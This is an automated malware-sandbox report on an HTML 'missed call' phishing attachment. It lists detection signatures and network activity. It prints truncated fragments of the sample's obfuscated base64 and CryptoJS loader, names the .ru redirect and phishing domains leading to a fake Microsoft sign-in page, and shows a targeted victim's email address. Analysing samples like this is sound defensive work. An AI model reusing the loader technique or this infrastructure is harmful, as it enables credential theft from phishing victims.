Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
MissedCall_Record_3295935663.html

Overview

General Information

Sample name:MissedCall_Record_3295935663.html
Analysis ID:1591142
MD5:b058f3f35f11d12f39651ecbab310b21
SHA1:5712bfd7bd20b9665b19ccc11456e8d34eebc97e
SHA256:a1211ebd6e5d214b3137cbad90d53d209629060a361dab66cb91fff2b0116f0a

Detection

Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

HTML file submission requesting Cloudflare captcha challenge
AI detected suspicious Javascript
Detected javascript redirector / loader
HTML page contains suspicious base64 encoded javascript
HTML sample is only containing javascript code
HTML body contains low number of good links
HTML page contains hidden javascript code
HTML title does not match URL
Stores files to the Windows start menu directory
Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 6908 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\MissedCall_Record_3295935663.html MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
    • chrome.exe (PID: 7136 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2020 --field-trial-handle=1984,i,11398822728638104287,1947308775252957004,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
  • cleanup
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

Phishing

barindex
Source: 0.1.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: file:///C:/Users/user/Desktop/MissedCall_Record_... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirection to a suspicious domain. The use of obfuscated code and multiple layers of encoding further increase the risk. While the script may have a legitimate purpose, the overall behavior is highly suspicious and indicative of malicious intent.
Source: 1.3..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://resourcerepgroup.com/res444.php?2-68747470... This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and the use of obfuscated code. While the script appears to be using the CryptoJS library for legitimate cryptographic operations, the overall behavior and lack of transparency raise significant security concerns.
Source: 0.5.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://uxgj.lantecomin.ru/gkmjFbTi/#W#Bsara.fishe... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. The use of obfuscated code and URLs further increases the risk. While the script may have some legitimate functionality, the overall behavior is highly suspicious and indicative of malicious intent.
Source: 0.7.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://uxgj.lantecomin.ru/gkmjFbTi/#W#Bsara.fishe... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. The use of obfuscated URLs and the interaction with an unknown domain 'deryposi.ru' further increase the risk. While the script appears to have some legitimate functionality related to a form submission, the overall behavior is highly suspicious and indicative of potential malicious intent.
Source: 0.6.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://uxgj.lantecomin.ru/gkmjFbTi/#W#Bsara.fishe... This script exhibits several high-risk behaviors, including detecting the presence of web automation tools, disabling common browser debugging and developer tools, and redirecting the user to a suspicious domain. The script also includes an obfuscated interval function that appears to be designed to detect and respond to debugging attempts. Overall, this script demonstrates a clear intent to hinder security analysis and potentially engage in malicious activities, warranting a high-risk score.
Source: MissedCall_Record_3295935663.htmlHTTP Parser: Low number of body elements: 0
Source: MissedCall_Record_3295935663.htmlHTTP Parser: Base64 decoded: document.write
Source: file:///C:/Users/user/Desktop/MissedCall_Record_3295935663.htmlHTTP Parser: Base64 decoded: document.write
Source: MissedCall_Record_3295935663.htmlHTTP Parser: <script> </script> <script> _0xccc7 = '#Bsara.fisher@overlakehospital.org'; (() => { const _0xeb5f = atob, _0x9b65 = ["ZG9jdW1lbnQud3JpdGUoYXRvYihgUEdoMGJXdytEUW84YldWMFlTQnVZVzFsUFNKMmFXVjNjRzl5ZENJZ1kyOXVkR1Z1ZEQwaWQybGtkR2c5WkdWMmFXTmxMWGRwWkhSb0...
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638724712560964076.ZTUzMzIzZWYtOGJhNy00YzFlLTkyNTgtMTAxOGViNjRjM2IzMGQ5NWIwNGMtZTI3NC00ZWY3LTkwMzUtMWNiMTBjY2JhMTIx&ui_locales=en-US&mkt=en-US&client-request-id=9a583ca7-8344-4503-8721-796e492a66a8&state=ybnbi3iSEIZ6YwNi0-mI-zuXrQLOBwf0cgnttE_n53o53kblOCLTUGu9-eE2JRqkbj6qlAzUSebblgUXVzTKQpLaZpN-ll5LwFRLFZaZP_-kegrhmyhuvwrN59F9Seh9CpKfc5HAFOZpQJj-eCvL1r8JY2h8k69_KoQkeEqJxz0YWlVu1q-Nkr_3RlT0ylzYhdk2aVRmxg1q_TZa8SkrjM8nQ2zzpLMGjo3vDImny6XdkmrwBQcCbJB_0S9tNnceFzf6UcTT18p9BylbynCp4A&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: Number of links: 0
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638724712560964076.ZTUzMzIzZWYtOGJhNy00YzFlLTkyNTgtMTAxOGViNjRjM2IzMGQ5NWIwNGMtZTI3NC00ZWY3LTkwMzUtMWNiMTBjY2JhMTIx&ui_locales=en-US&mkt=en-US&client-request-id=9a583ca7-8344-4503-8721-796e492a66a8&state=ybnbi3iSEIZ6YwNi0-mI-zuXrQLOBwf0cgnttE_n53o53kblOCLTUGu9-eE2JRqkbj6qlAzUSebblgUXVzTKQpLaZpN-ll5LwFRLFZaZP_-kegrhmyhuvwrN59F9Seh9CpKfc5HAFOZpQJj-eCvL1r8JY2h8k69_KoQkeEqJxz0YWlVu1q-Nkr_3RlT0ylzYhdk2aVRmxg1q_TZa8SkrjM8nQ2zzpLMGjo3vDImny6XdkmrwBQcCbJB_0S9tNnceFzf6UcTT18p9BylbynCp4A&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: Number of links: 0
Source: MissedCall_Record_3295935663.htmlHTTP Parser: Base64 decoded: document.write(atob(`PGh0bWw+DQo8bWV0YSBuYW1lPSJ2aWV3cG9ydCIgY29udGVudD0id2lkdGg9ZGV2aWNlLXdpZHRoLCAJaW5pdGlhbC1zY2FsZT0xLjAiPg0KDQo8c3R5bGU+DQogIGJvZHkgIHsNCg0KICBkaXNwbGF5OiAgZmxleDsNCg0KCWp1c3RpZnktY29udGVudDoJY2VudGVyOw0KDQoJYWxpZ24taXRlbXM6IAljZW50ZX...
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638724712560964076.ZTUzMzIzZWYtOGJhNy00YzFlLTkyNTgtMTAxOGViNjRjM2IzMGQ5NWIwNGMtZTI3NC00ZWY3LTkwMzUtMWNiMTBjY2JhMTIx&ui_locales=en-US&mkt=en-US&client-request-id=9a583ca7-8344-4503-8721-796e492a66a8&state=ybnbi3iSEIZ6YwNi0-mI-zuXrQLOBwf0cgnttE_n53o53kblOCLTUGu9-eE2JRqkbj6qlAzUSebblgUXVzTKQpLaZpN-ll5LwFRLFZaZP_-kegrhmyhuvwrN59F9Seh9CpKfc5HAFOZpQJj-eCvL1r8JY2h8k69_KoQkeEqJxz0YWlVu1q-Nkr_3RlT0ylzYhdk2aVRmxg1q_TZa8SkrjM8nQ2zzpLMGjo3vDImny6XdkmrwBQcCbJB_0S9tNnceFzf6UcTT18p9BylbynCp4A&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: Title: Redirecting does not match URL
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638724712560964076.ZTUzMzIzZWYtOGJhNy00YzFlLTkyNTgtMTAxOGViNjRjM2IzMGQ5NWIwNGMtZTI3NC00ZWY3LTkwMzUtMWNiMTBjY2JhMTIx&ui_locales=en-US&mkt=en-US&client-request-id=9a583ca7-8344-4503-8721-796e492a66a8&state=ybnbi3iSEIZ6YwNi0-mI-zuXrQLOBwf0cgnttE_n53o53kblOCLTUGu9-eE2JRqkbj6qlAzUSebblgUXVzTKQpLaZpN-ll5LwFRLFZaZP_-kegrhmyhuvwrN59F9Seh9CpKfc5HAFOZpQJj-eCvL1r8JY2h8k69_KoQkeEqJxz0YWlVu1q-Nkr_3RlT0ylzYhdk2aVRmxg1q_TZa8SkrjM8nQ2zzpLMGjo3vDImny6XdkmrwBQcCbJB_0S9tNnceFzf6UcTT18p9BylbynCp4A&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: Title: Sign in to your account does not match URL
Source: https://resourcerepgroup.com/res444.php?2-68747470733a2f2f5558474a2e6c616e7465636f6d696e2e72752f676b6d6a466254692f-_0xccc7HTTP Parser: var rlsgcqnalccfrwpl = document.createelement("script");rlsgcqnalccfrwpl.setattribute("src","https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js");document.head.append(rlsgcqnalccfrwpl);rlsgcqnalccfrwpl.onload=function(){var {a,b,c,d} = json.parse(atob("eyjhijoicdvucmlhogq3a09xmfz1nthlbuvnrznvekfbdgdxcjlvte40qzjrtfvjswtxa1jft2nwcg04aklrdjm2z3nkovvry283d0vxufy0svwvdjfntmvcdudnujbuwfwva0xnuzrsd05qvlwvb2qwdjhcduh1m0nkdzjzutbgmlvxmjcwz25suunsyng2uldptlprs01zbkfpblr5rxc4dfq5k0nhywqwmzlqnvryb2xvnhbla2hddhvtqlzqowt6wgdhduthqwwrrfwvc3nsujv4znf1k3q5uwuwslh4cuoznzu5ahlsee84sxbbaexiv01xmxzpn2lyemdbm0tnngr6szdptkjus0tyv1nirkhanfnidekweuxhcmfvd0lknnvpb3fqwkhzzvkzvjdkbkzhyvbor3ltbgjhmdnfblyyegfcbmhcxc9jakrfuezba3c0buiychyyyzfrtzv1aljcl3prnzrhy1lwbhzwt0mwzdlczundsmposwrjqkrgz0fpm2vgqtrqcmrsxc9qafptsstqyupeue1uee5razjru0eyqmdyeuw1q3bvdm9zsll3r0v6zgrvnxhpvxdmae9xykzccw4xk0nbzhrjk1nlbg1ebkzen1l5ahvbbw13swu0rstjv1jkvkrtunr1swhjedj0xc9usmiwczjgq1jftlwvwmc5nw9urtjfagvozxfovnm5we81v0p4n1d5sklltvhkdu...
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638724712560964076.ZTUzMzIzZWYtOGJhNy00YzFlLTkyNTgtMTAxOGViNjRjM2IzMGQ5NWIwNGMtZTI3NC00ZWY3LTkwMzUtMWNiMTBjY2JhMTIx&ui_locales=en-US&mkt=en-US&client-request-id=9a583ca7-8344-4503-8721-796e492a66a8&state=ybnbi3iSEIZ6YwNi0-mI-zuXrQLOBwf0cgnttE_n53o53kblOCLTUGu9-eE2JRqkbj6qlAzUSebblgUXVzTKQpLaZpN-ll5LwFRLFZaZP_-kegrhmyhuvwrN59F9Seh9CpKfc5HAFOZpQJj-eCvL1r8JY2h8k69_KoQkeEqJxz0YWlVu1q-Nkr_3RlT0ylzYhdk2aVRmxg1q_TZa8SkrjM8nQ2zzpLMGjo3vDImny6XdkmrwBQcCbJB_0S9tNnceFzf6UcTT18p9BylbynCp4A&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: <input type="password" .../> found
Source: file:///C:/Users/user/Desktop/MissedCall_Record_3295935663.htmlHTTP Parser: No favicon
Source: https://uxgj.lantecomin.ru/gkmjFbTi/#W#Bsara.fisher@overlakehospital.orgHTTP Parser: No favicon
Source: https://uxgj.lantecomin.ru/gkmjFbTi/#W#Bsara.fisher@overlakehospital.orgHTTP Parser: No favicon
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638724712560964076.ZTUzMzIzZWYtOGJhNy00YzFlLTkyNTgtMTAxOGViNjRjM2IzMGQ5NWIwNGMtZTI3NC00ZWY3LTkwMzUtMWNiMTBjY2JhMTIx&ui_locales=en-US&mkt=en-US&client-request-id=9a583ca7-8344-4503-8721-796e492a66a8&state=ybnbi3iSEIZ6YwNi0-mI-zuXrQLOBwf0cgnttE_n53o53kblOCLTUGu9-eE2JRqkbj6qlAzUSebblgUXVzTKQpLaZpN-ll5LwFRLFZaZP_-kegrhmyhuvwrN59F9Seh9CpKfc5HAFOZpQJj-eCvL1r8JY2h8k69_KoQkeEqJxz0YWlVu1q-Nkr_3RlT0ylzYhdk2aVRmxg1q_TZa8SkrjM8nQ2zzpLMGjo3vDImny6XdkmrwBQcCbJB_0S9tNnceFzf6UcTT18p9BylbynCp4A&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No favicon
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638724712560964076.ZTUzMzIzZWYtOGJhNy00YzFlLTkyNTgtMTAxOGViNjRjM2IzMGQ5NWIwNGMtZTI3NC00ZWY3LTkwMzUtMWNiMTBjY2JhMTIx&ui_locales=en-US&mkt=en-US&client-request-id=9a583ca7-8344-4503-8721-796e492a66a8&state=ybnbi3iSEIZ6YwNi0-mI-zuXrQLOBwf0cgnttE_n53o53kblOCLTUGu9-eE2JRqkbj6qlAzUSebblgUXVzTKQpLaZpN-ll5LwFRLFZaZP_-kegrhmyhuvwrN59F9Seh9CpKfc5HAFOZpQJj-eCvL1r8JY2h8k69_KoQkeEqJxz0YWlVu1q-Nkr_3RlT0ylzYhdk2aVRmxg1q_TZa8SkrjM8nQ2zzpLMGjo3vDImny6XdkmrwBQcCbJB_0S9tNnceFzf6UcTT18p9BylbynCp4A&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638724712560964076.ZTUzMzIzZWYtOGJhNy00YzFlLTkyNTgtMTAxOGViNjRjM2IzMGQ5NWIwNGMtZTI3NC00ZWY3LTkwMzUtMWNiMTBjY2JhMTIx&ui_locales=en-US&mkt=en-US&client-request-id=9a583ca7-8344-4503-8721-796e492a66a8&state=ybnbi3iSEIZ6YwNi0-mI-zuXrQLOBwf0cgnttE_n53o53kblOCLTUGu9-eE2JRqkbj6qlAzUSebblgUXVzTKQpLaZpN-ll5LwFRLFZaZP_-kegrhmyhuvwrN59F9Seh9CpKfc5HAFOZpQJj-eCvL1r8JY2h8k69_KoQkeEqJxz0YWlVu1q-Nkr_3RlT0ylzYhdk2aVRmxg1q_TZa8SkrjM8nQ2zzpLMGjo3vDImny6XdkmrwBQcCbJB_0S9tNnceFzf6UcTT18p9BylbynCp4A&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638724712560964076.ZTUzMzIzZWYtOGJhNy00YzFlLTkyNTgtMTAxOGViNjRjM2IzMGQ5NWIwNGMtZTI3NC00ZWY3LTkwMzUtMWNiMTBjY2JhMTIx&ui_locales=en-US&mkt=en-US&client-request-id=9a583ca7-8344-4503-8721-796e492a66a8&state=ybnbi3iSEIZ6YwNi0-mI-zuXrQLOBwf0cgnttE_n53o53kblOCLTUGu9-eE2JRqkbj6qlAzUSebblgUXVzTKQpLaZpN-ll5LwFRLFZaZP_-kegrhmyhuvwrN59F9Seh9CpKfc5HAFOZpQJj-eCvL1r8JY2h8k69_KoQkeEqJxz0YWlVu1q-Nkr_3RlT0ylzYhdk2aVRmxg1q_TZa8SkrjM8nQ2zzpLMGjo3vDImny6XdkmrwBQcCbJB_0S9tNnceFzf6UcTT18p9BylbynCp4A&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638724712560964076.ZTUzMzIzZWYtOGJhNy00YzFlLTkyNTgtMTAxOGViNjRjM2IzMGQ5NWIwNGMtZTI3NC00ZWY3LTkwMzUtMWNiMTBjY2JhMTIx&ui_locales=en-US&mkt=en-US&client-request-id=9a583ca7-8344-4503-8721-796e492a66a8&state=ybnbi3iSEIZ6YwNi0-mI-zuXrQLOBwf0cgnttE_n53o53kblOCLTUGu9-eE2JRqkbj6qlAzUSebblgUXVzTKQpLaZpN-ll5LwFRLFZaZP_-kegrhmyhuvwrN59F9Seh9CpKfc5HAFOZpQJj-eCvL1r8JY2h8k69_KoQkeEqJxz0YWlVu1q-Nkr_3RlT0ylzYhdk2aVRmxg1q_TZa8SkrjM8nQ2zzpLMGjo3vDImny6XdkmrwBQcCbJB_0S9tNnceFzf6UcTT18p9BylbynCp4A&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638724712560964076.ZTUzMzIzZWYtOGJhNy00YzFlLTkyNTgtMTAxOGViNjRjM2IzMGQ5NWIwNGMtZTI3NC00ZWY3LTkwMzUtMWNiMTBjY2JhMTIx&ui_locales=en-US&mkt=en-US&client-request-id=9a583ca7-8344-4503-8721-796e492a66a8&state=ybnbi3iSEIZ6YwNi0-mI-zuXrQLOBwf0cgnttE_n53o53kblOCLTUGu9-eE2JRqkbj6qlAzUSebblgUXVzTKQpLaZpN-ll5LwFRLFZaZP_-kegrhmyhuvwrN59F9Seh9CpKfc5HAFOZpQJj-eCvL1r8JY2h8k69_KoQkeEqJxz0YWlVu1q-Nkr_3RlT0ylzYhdk2aVRmxg1q_TZa8SkrjM8nQ2zzpLMGjo3vDImny6XdkmrwBQcCbJB_0S9tNnceFzf6UcTT18p9BylbynCp4A&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No <meta name="copyright".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638724712560964076.ZTUzMzIzZWYtOGJhNy00YzFlLTkyNTgtMTAxOGViNjRjM2IzMGQ5NWIwNGMtZTI3NC00ZWY3LTkwMzUtMWNiMTBjY2JhMTIx&ui_locales=en-US&mkt=en-US&client-request-id=9a583ca7-8344-4503-8721-796e492a66a8&state=ybnbi3iSEIZ6YwNi0-mI-zuXrQLOBwf0cgnttE_n53o53kblOCLTUGu9-eE2JRqkbj6qlAzUSebblgUXVzTKQpLaZpN-ll5LwFRLFZaZP_-kegrhmyhuvwrN59F9Seh9CpKfc5HAFOZpQJj-eCvL1r8JY2h8k69_KoQkeEqJxz0YWlVu1q-Nkr_3RlT0ylzYhdk2aVRmxg1q_TZa8SkrjM8nQ2zzpLMGjo3vDImny6XdkmrwBQcCbJB_0S9tNnceFzf6UcTT18p9BylbynCp4A&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638724712560964076.ZTUzMzIzZWYtOGJhNy00YzFlLTkyNTgtMTAxOGViNjRjM2IzMGQ5NWIwNGMtZTI3NC00ZWY3LTkwMzUtMWNiMTBjY2JhMTIx&ui_locales=en-US&mkt=en-US&client-request-id=9a583ca7-8344-4503-8721-796e492a66a8&state=ybnbi3iSEIZ6YwNi0-mI-zuXrQLOBwf0cgnttE_n53o53kblOCLTUGu9-eE2JRqkbj6qlAzUSebblgUXVzTKQpLaZpN-ll5LwFRLFZaZP_-kegrhmyhuvwrN59F9Seh9CpKfc5HAFOZpQJj-eCvL1r8JY2h8k69_KoQkeEqJxz0YWlVu1q-Nkr_3RlT0ylzYhdk2aVRmxg1q_TZa8SkrjM8nQ2zzpLMGjo3vDImny6XdkmrwBQcCbJB_0S9tNnceFzf6UcTT18p9BylbynCp4A&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638724712560964076.ZTUzMzIzZWYtOGJhNy00YzFlLTkyNTgtMTAxOGViNjRjM2IzMGQ5NWIwNGMtZTI3NC00ZWY3LTkwMzUtMWNiMTBjY2JhMTIx&ui_locales=en-US&mkt=en-US&client-request-id=9a583ca7-8344-4503-8721-796e492a66a8&state=ybnbi3iSEIZ6YwNi0-mI-zuXrQLOBwf0cgnttE_n53o53kblOCLTUGu9-eE2JRqkbj6qlAzUSebblgUXVzTKQpLaZpN-ll5LwFRLFZaZP_-kegrhmyhuvwrN59F9Seh9CpKfc5HAFOZpQJj-eCvL1r8JY2h8k69_KoQkeEqJxz0YWlVu1q-Nkr_3RlT0ylzYhdk2aVRmxg1q_TZa8SkrjM8nQ2zzpLMGjo3vDImny6XdkmrwBQcCbJB_0S9tNnceFzf6UcTT18p9BylbynCp4A&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.17:49730 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.5.88:443 -> 192.168.2.17:49796 version: TLS 1.2
Source: unknownHTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.17:49805 version: TLS 1.2
Source: chrome.exeMemory has grown: Private usage: 1MB later: 29MB
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficDNS traffic detected: DNS query: www.w3schools.com
Source: global trafficDNS traffic detected: DNS query: resourcerepgroup.com
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: uxgj.lantecomin.ru
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: 2z8rb929h45s8kmdjiivosirpqipllvex8sgy1psdxeak2g6mrps1eus.deryposi.ru
Source: global trafficDNS traffic detected: DNS query: login.microsoftonline.com
Source: global trafficDNS traffic detected: DNS query: www.office.com
Source: global trafficDNS traffic detected: DNS query: aadcdn.msftauth.net
Source: global trafficDNS traffic detected: DNS query: identity.nel.measure.office.net
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
